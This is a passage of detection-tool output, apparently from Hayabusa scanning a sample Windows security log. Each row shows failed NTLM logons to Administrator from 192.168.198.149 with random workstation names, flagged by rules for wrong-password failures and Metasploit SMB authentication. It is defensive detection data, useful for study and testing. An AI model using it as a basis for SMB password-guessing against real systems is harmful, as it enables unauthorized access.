Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrQGfxInmlgPqGtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcsMMQbsnUdyLJWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oRYZqBBsq9GyApI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0TAhib6p8fY5iOgI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FerGHj9abOe6ehZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kN4B4KLpXbyKZzGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HJtoyRfP38T3KToO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkI5hLApUWhGnKIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZCPSO4JLjMur2Eow : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHmrv2xFuq7TyIQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8SqYq3msNfFh24lg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YE0a2Bypzc1MMdGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ojgIg88VK6hB72PI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehLrf2GoAhY3Rf7Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ccfgpjwpis15B4gY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vysSf3DsOxQf5fVd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEp88cEeiNw4IQsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5PXDJPzw0gPdlCiH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mwoe9IgWx2UZ7Iuu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3eW0nFDUwKFzoQIw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q0i0p5QxJ4ykYYJt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VsxqWAnd6j2CdyB3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5qdy80mtFWl199k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ce0d84uBK4t2sqR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4dZYZEW1VijjwHN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmqGJWbeap5dv0gC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaNUqChgVSbDkFQu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B4PDZ55it0V4QGnM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQxXVB8Aj5gaw2f2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzDeZtgSJoH74GYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iNAFsZraFvw67WWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aVdnbyzWqk58rOW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjUH2PopXCrrPzqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ylmV2z3WjTWsTpyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qBKZTYRTKuEAgS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JvekO4A5f6QK2ynZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDUqydSeA1guOjIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o71TltsJDyOIuLQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXT3MSCes42dVCNn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FGXiWeT8Evr6G70M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V2RarzrnGgcLaseH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3k7dXu9o1vMkhby : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EDBt76dmYnPstFWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4yjzMC7cw0fe7gjS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eQOWCM7KP68DZTX9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kn9WWWqCIwfrPbie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQcamLSzsXOjP6FL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 